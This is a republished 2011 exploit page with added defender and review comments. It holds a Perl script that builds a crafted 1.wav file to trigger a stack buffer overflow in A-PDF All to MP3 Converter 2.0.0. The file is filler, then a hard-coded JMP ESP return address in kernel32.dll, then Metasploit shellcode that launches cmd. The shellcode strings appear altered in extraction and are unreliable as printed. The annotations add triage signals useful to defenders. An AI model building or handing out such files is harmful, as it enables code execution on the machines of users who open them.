A-PDF All To MP3 Converter 2.0.0 Buffer Overflow
Posted on 18 January 2011
# Exploit Title: A-PDF All to MP3 Converter v.2.0.0 stack based buffer overflow
# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm
# Version: <= 2.0.0
# Tested on: Win XP SP3 French
# Date: 17/01/2011
# Author: h1ch4m
#Email: h1ch4m@live.fr
#Home: http://Net-Effects.blogspot.com
# triggering details: Open the app, drag the wav file, booom cmd pops out
#
# What this script does: it writes one file, 1.wav, whose content is three
# strings concatenated in this order: a filler string, a packed 32-bit value,
# and an encoded payload string.
#
# NOTE(review): the quoted strings below appear to have been altered when the
# page was extracted; they are kept exactly as printed and not reconstructed.
#
# Defender notes:
#  - The output file begins with the filler string, not with the RIFF/WAVE
#    header a real .wav file starts with. A ".wav" whose first bytes are not
#    "RIFF" is a cheap triage signal for this kind of file.
#  - Per the author's payload comment (CMD=cmd), the visible effect is a
#    command prompt started from the converter process. A media converter
#    spawning cmd.exe is worth alerting on.
#  - The page names no fixed version. Until the vendor's status is confirmed,
#    treat <= 2.0.0 as affected and do not open untrusted audio files in it.

# Name of the file to create, relative to the current directory.
my $file= "1.wav";

# Filler: the quoted string repeated 4128 times. It is written before $EIP,
# so its length decides where $EIP lands in the file.
my $junk = "x41" x 4128;

# pack('V', ...) encodes the number as a 32-bit little-endian unsigned value.
# The number is a hard-coded absolute address. The author's comment places it
# in kernel32.dll, and only Win XP SP3 French is listed as tested.
# NOTE(review): presumably tied to that exact DLL build. Returning to a fixed
# system-DLL address and running code from the stack is the pattern ASLR and
# DEP are meant to break; confirm which mitigations the target binary uses.
my $EIP = pack('V', 0x7c86467b); # JMP ESP (ff e4) kernel32.dll

# Payload description as given by the author (generator, size, encoder,
# options). Nothing in this script decodes or checks the payload; it is
# written to the file as an opaque string.
# windows/exec - 220 bytes
# http://www.metasploit.com
# Encoder: x86/call4_dword_xor
# EXITFUNC=seh, CMD=cmd
my $shellcode = "x29xc9x83xe9xcfxe8xffxffxffxffxc0x5ex81x76" .
"x0exd1xd1xc1x66x83xeexfcxe2xf4x2dx39x48x66" .
"xd1xd1xa1xefx34xe0x13x02x5ax83xf1xedx83xdd" .
"x4ax34xc5x5axb3x4exdex66x8bx40xe0x2exf0xa6" .
"x7dxedxa0x1axd3xfdxe1xa7x1exdcxc0xa1x33x21" .
"x93x31x5ax83xd1xedx93xedxc0xb6x5ax91xb9xe3" .
"x11xa5x8bx67x01x81x4ax2exc9x5ax99x46xd0x02" .
"x22x5ax98x5axf5xedxd0x07xf0x99xe0x11x6dxa7" .
"x1exdcxc0xa1xe9x31xb4x92xd2xacx39x5dxacxf5" .
"xb4x84x89x5ax99x42xd0x02xa7xedxddx9ax4ax3e" .
"xcdxd0x12xedxd5x5axc0xb6x58x95xe5x42x8ax8a" .
"xa0x3fx8bx80x3ex86x89x8ex9bxedxc3x3ax47x3b" .
"xbbxd0x4cxe3x68xd1xc1x66x81xb9xf0xedxbex56" .
"x3exb3x6ax2fxcfx54x3bxb9x67xf3x6cx4cx3exb3" .
"xedxd7xbdx6cx51x2ax21x13xd4x6ax86x75xa3xbe" .
"xabx66x82x2ex14x05xbcxb5xc1x66";

# Two-argument open on an undeclared $FILE, with no error check and no
# binmode. If the file cannot be created, the print and close below fail
# without any message.
open($FILE,">$file");
# File layout: filler, then the packed address, then the payload.
print $FILE $junk.$EIP.$shellcode;
close($FILE);